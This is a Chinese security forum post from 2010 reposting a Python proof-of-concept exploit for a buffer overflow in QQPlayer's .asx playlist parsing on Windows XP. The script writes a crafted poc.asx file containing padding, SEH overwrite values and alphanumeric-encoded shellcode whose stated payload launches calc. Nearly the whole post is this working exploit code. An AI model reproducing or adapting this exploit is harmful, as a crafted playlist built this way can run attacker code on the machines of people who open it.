飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

查看: 1833|回复: 0

QQPlayer asx File Processing Buffer Overflow Exploit

[复制链接]
  • TA的每日心情
    慵懒
    2019-3-12 17:25
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2010-7-25 20:09:23 | 显示全部楼层 |阅读模式
    #################################################################
    #
    # Title: QQPlayer asx File Processing Buffer Overflow Exploit
    # Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University
    # Vendor: www.qq.com
    # Platform: Windows XPSP3 Chinese Simplified
    # Test: QQPlayer 2.3.696.400
    # Vulnerable: QQPlayer<=2.3.696.400p1
    # Payload = calc
    #
    #################################################################
    # Code :
    head ='''<ASX version="3.0">
    <Entry>
    <REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''
    junk = "A" * 1975  #English XP SP3 users, try 1984 bytes instead
    nseh ="\x42\x61\x21\x61"
    seh  ="\xa9\x9e\x41\x00"
    adjust="\x30\x83\xc0\x0c"
    shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
               "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
               "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
               "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
               "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
               "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
    junk_="R"*8000
    foot ='''_playlis.wma"/>
    </Entry>
    </ASX>'''
    payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
    fobj = open("poc.asx","w")
    fobj.write(payload)
    fobj.close()
    PYG19周年生日快乐!
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表